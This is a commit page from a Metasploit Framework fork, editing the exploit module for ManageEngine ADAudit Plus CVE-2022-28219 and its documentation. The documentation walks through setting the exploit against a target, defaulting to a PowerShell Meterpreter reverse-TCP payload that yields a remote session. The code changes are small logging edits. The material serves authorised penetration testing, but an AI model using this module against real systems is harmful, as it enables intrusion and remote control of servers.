dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

make some prints vprints, add steps

This commit is contained in:
space-r7 2022-08-05 11:34:46 -05:00
parent 7c21c57564
commit 4202502992
No known key found for this signature in database
GPG Key ID: DE80BD86F1B96C84
2 changed files with 10 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
documentation/modules/exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219.md
View File

@ -8,14 +8,19 @@ The last thing is, three connect-back ports must be open from the target back to
## Verification Steps
1. Install the application
2. Do: `set RHOSTS <IP>`
3. Do: `set DOMAIN <DOMAIN_NAME>`
4. Do: `exploit`
5. You should get a meterpreter session
## Scenarios
```
msf6 > use exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > set RHOSTS 10.0.0.148
RHOSTS => 10.0.0.148
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > exploit
[-] Msf::OptionValidateError The following options failed to validate: DOMAIN
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > set DOMAIN ad.example.local
DOMAIN => ad.example.local
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > exploit

6
modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb
View File

@ -41,7 +41,6 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => 'win',
'Arch' => [ARCH_CMD],
'Privileged' => false,
'Targets' => [
[
'Windows Command',
@ -51,7 +50,6 @@ class MetasploitModule < Msf::Exploit::Remote
}
],
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 8081
@ -330,7 +328,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
if directory_listing.nil? || directory_listing.empty?
print_warning('FTP client connected, but we did not receive any data over the socket')
vprint_warning('FTP client connected, but we did not receive any data over the socket')
return nil
end
@ -344,7 +342,7 @@ class MetasploitModule < Msf::Exploit::Remote
# This will search for the payload, but right now just print stuff
listing = get_directory_listing(dir)
unless listing
print_warning("Couldn't get directory listing for #{dir}")
vprint_warning("Couldn't get directory listing for #{dir}")
next []
end